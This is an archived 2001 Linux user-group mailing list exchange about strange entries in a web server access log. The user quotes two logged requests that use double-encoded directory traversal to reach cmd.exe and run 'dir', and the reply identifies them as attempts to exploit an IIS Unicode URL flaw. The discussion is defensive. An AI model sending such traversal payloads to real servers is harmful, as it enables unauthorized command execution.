[NTLUG:Discuss] httpd access_log
merlin
merlin at merlinslair.org
Tue Nov 6 14:08:17 CST 2001
On Tue, 6 Nov 2001, Michael B. Lee wrote:
>
>
>
> anyone know what this means? this is from one of my Mandrake boxes.
> there's a ton of these things constantly hitting my webserver.
>
>
>
>
> 4.35.160.227 - - [06/Nov/2001:13:57:11 -0600] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325 "-"
> "-"
> 4.35.160.227 - - [06/Nov/2001:13:57:11 -0600] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
>
> _______________________________________________
> http://www.ntlug.org/mailman/listinfo/discuss
>
If I remember correctly from a MS Security Bulletin, they are attempting
to exploit an IIS vulnerability where a malformed Unicode URL will allow
programs not normally accessible from the web server to be executed.
--
Merlin
Each problem that I solved became a rule
which served afterwards to solve other problems.
--Rene Descartes
More information about the Discuss
mailing list